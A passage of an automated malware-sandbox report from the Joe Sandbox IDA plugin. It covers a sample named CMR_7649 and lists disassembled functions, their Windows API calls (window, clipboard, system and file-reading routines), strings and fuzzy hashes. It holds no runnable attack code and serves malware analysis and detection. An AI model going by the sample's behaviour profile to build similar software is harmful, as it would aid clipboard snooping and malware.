                                                • Opcode Fuzzy Hash: 7d529682ee5fc17807d9f1869fe525bc37d3a13623003215e7c5094f22c59936
                                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                • DestroyWindow.USER32(?), ref: 00456746
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                • String ID: ($,$tooltips_class32
                                                • API String ID: 225202481-3320066284
                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                • CloseClipboard.USER32 ref: 0046DD41
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                • CloseClipboard.USER32 ref: 0046DD99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                • String ID:
                                                • API String ID: 15083398-0
                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                • String ID: @$AutoIt v3 GUI
                                                • API String ID: 867697134-3359773793
                                                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$__wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                • API String ID: 790654849-32604322
                                                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                • _fseek.LIBCMT ref: 00452B3B
                                                • __wsplitpath.LIBCMT ref: 00452B9B
                                                • _wcscpy.LIBCMT ref: 00452BB0
                                                • _wcscat.LIBCMT ref: 00452BC5
                                                • __wsplitpath.LIBCMT ref: 00452BEF
                                                • _wcscat.LIBCMT ref: 00452C07
                                                • _wcscat.LIBCMT ref: 00452C1C
                                                • __fread_nolock.LIBCMT ref: 00452C53
                                                • __fread_nolock.LIBCMT ref: 00452C64
                                                • __fread_nolock.LIBCMT ref: 00452C83
                                                • __fread_nolock.LIBCMT ref: 00452C94
                                                • __fread_nolock.LIBCMT ref: 00452CB5
                                                • __fread_nolock.LIBCMT ref: 00452CC6
                                                • __fread_nolock.LIBCMT ref: 00452CD7
                                                • __fread_nolock.LIBCMT ref: 00452CE8
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                • __fread_nolock.LIBCMT ref: 00452D78
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                • String ID:
                                                • API String ID: 2054058615-0
                                                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window
                                                • String ID: 0
                                                • API String ID: 2353593579-4108050209
                                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                • String ID:
                                                • API String ID: 1744303182-0
                                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                • __mtterm.LIBCMT ref: 00417C34
                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                • API String ID: 4163708885-3819984048
                                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2485277191-404129466
                                                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                • SetWindowTextW.USER32(?,?), ref: 00454678
                                                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                • GetWindowRect.USER32(?,?), ref: 004546F5
                                                • SetWindowTextW.USER32(?,?), ref: 00454765
                                                • GetDesktopWindow.USER32 ref: 0045476F
                                                • GetWindowRect.USER32(00000000), ref: 00454776
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                • GetClientRect.USER32(?,?), ref: 004547D2
                                                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 00464B28
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                • _wcslen.LIBCMT ref: 00464C28
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                • _wcslen.LIBCMT ref: 00464CBA
                                                • _wcslen.LIBCMT ref: 00464CD0
                                                • _wcslen.LIBCMT ref: 00464CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
